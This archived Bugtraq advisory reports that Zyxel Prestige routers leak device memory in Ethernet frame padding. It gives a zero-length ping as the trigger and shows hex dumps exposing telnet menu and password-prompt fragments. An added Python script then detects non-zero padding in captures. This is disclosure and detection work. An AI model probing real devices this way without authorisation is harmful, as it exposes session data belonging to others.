Open Source and information security mailing list archives
Date: Sat, 07 Feb 2004 13:42:05 +0100
From: DiSToAGe <distoage@...i.net>
To: bugtraq@...urityfocus.com
Subject: [Fwd: zyxel prestige ethernet information leakage]


I sent a mail to the vendor, without response, so here it is.

In the example here you can see information about the telnet interface
previously connected to.

Note the problem does not only exist with ICMP packets but seems to be in
ACK packets on TCP too. I don't know if the problem exists only on the LAN
side or if the bad padding is added on the ADSL side too, so
information can be seen by remote hosts.

I don't know if other models are vulnerable too.

> 
> Hi,
> 
> Some ethernet interfaces have security problems: information leakage.
> Please see CERT vulnerability #412115
> 
> http://www.kb.cert.org/vuls/id/412115
> 
> It says that Zyxel devices with ZyNOS v.2.50 to v.3.60 are not vulnerable
> but it isn't true.
> 
> Here you can see a report with a Zyxel Prestige 650R-11 ADSL router.
> 
>                 Name: Router
>                 Routing: IP
>                 ZyNOS F/W Version: V3.40(ES.5) | 2/10/2003
>                 ADSL Chipset Vendor:  Alcatel, Version  3.9.122
>                 Standard: Multi-Mode
> 
> Send an ICMP packet with less data than normal, so the remote interface pads
> with data to complete the frame:
> 
> ping -s 0 router
> 
> Here are the replies; you can see other portions of memory in the replies by
> the router:
> 
> 10:15:42.904088 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae1 0000 fe01 aeab c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17f2 e80c 0001 456e 7465        ............Ente
> 0x0020   721b 5b32 313b 3333 484d 656e 751b             r.[21;33HMenu.
> 10:15:43.918189 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae2 0000 fe01 aeaa c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17f1 e80c 0002 6377 437a        ............cwCz
> 0x0020   5010 03ff 434b 0000 27ff fc05 fffe             P...CK..'.....
> 10:15:44.928354 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae3 0000 fe01 aea9 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17f0 e80c 0003 6377 437a        ............cwCz
> 0x0020   5010 0400 434a 0000 0204 0200 c0a8             P...CJ........
> 10:15:45.938513 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae4 0000 fe01 aea8 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17ef e80c 0004 5061 7373        ............Pass
> 0x0020   776f 7264 3a20 0000 02ac 3c93 c0a8             word:.....<...
> 10:15:46.948675 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae5 0000 fe01 aea7 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17ee e80c 0005 6377 437c        ............cwC|
> 0x0020   5010 03fe 4349 0000 0204 0200 c0a8             P...CI........
> 10:15:47.958838 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae6 0000 fe01 aea6 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17ed e80c 0006 6377 437c        ............cwC|
> 0x0020   5010 0400 4347 0000 75dd 6642 c0a8             P...CG..u.fB..



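The post only shows the leak as raw hex dumps. The following Python script is an added example written for this page (not code from the advisory, CERT or Zyxel): it reads tcpdump -x output, compares each IPv4 packet's total length with the number of bytes actually captured, and flags any Ethernet padding that is not zero-filled. Two of the echo replies from the post are embedded as the sample; the fixed "offset / hex words / ASCII" column layout of the dump lines is an assumption taken from those lines.

```python
import re

# Two echo replies copied from the post's tcpdump -x output; the fixed
# "offset   hex words   ascii" column layout is assumed from these lines.
SAMPLE_CAPTURE = """\
10:15:42.904088 router > station: icmp: echo reply
0x0000   4500 001c 8ae1 0000 fe01 aeab c0a8 0101        E...............
0x0010   c0a8 0102 0000 17f2 e80c 0001 456e 7465        ............Ente
0x0020   721b 5b32 313b 3333 484d 656e 751b             r.[21;33HMenu.
10:15:45.938513 router > station: icmp: echo reply
0x0000   4500 001c 8ae4 0000 fe01 aea8 c0a8 0101        E...............
0x0010   c0a8 0102 0000 17ef e80c 0004 5061 7373        ............Pass
0x0020   776f 7264 3a20 0000 02ac 3c93 c0a8             word:.....<...
"""

def parse_tcpdump_hex(text):
    """Yield (summary_line, raw_bytes) for each packet in tcpdump -x output."""
    summary, chunks = None, []
    for line in text.splitlines():
        if re.match(r"^0x[0-9a-f]{4}\s", line):
            # offset, hex words and ASCII column are separated by 3+ spaces;
            # splitting on those keeps the ASCII column out of the bytes
            fields = re.split(r"\s{3,}", line.strip())
            chunks.append(bytes.fromhex(fields[1].replace(" ", "")))
        elif line.strip():
            if summary is not None:
                yield summary, b"".join(chunks)
            summary, chunks = line.strip(), []
    if summary is not None:
        yield summary, b"".join(chunks)

def frame_padding(raw):
    """Bytes past the IPv4 total length: padding added to reach the 46-byte
    minimum Ethernet payload (the dump starts at the IP header)."""
    if len(raw) < 20 or raw[0] >> 4 != 4:
        return None  # not IPv4, nothing to compare against
    total_len = int.from_bytes(raw[2:4], "big")
    return raw[total_len:]

def find_padding_leaks(text):
    """Return (summary, padding) for packets whose padding is not zero-filled.
    Zero padding is what a correct driver sends; anything else is device memory."""
    leaks = []
    for summary, raw in parse_tcpdump_hex(text):
        pad = frame_padding(raw)
        if pad and any(pad):
            leaks.append((summary, pad))
    return leaks
```

Running find_padding_leaks(SAMPLE_CAPTURE) reports both replies with 18 bytes of non-zero padding each: the IP total length is 28 (20-byte header plus an 8-byte ICMP echo with no data), while 46 bytes reached the wire, and the excess carries the menu banner and "Password: " prompt of the earlier telnet session.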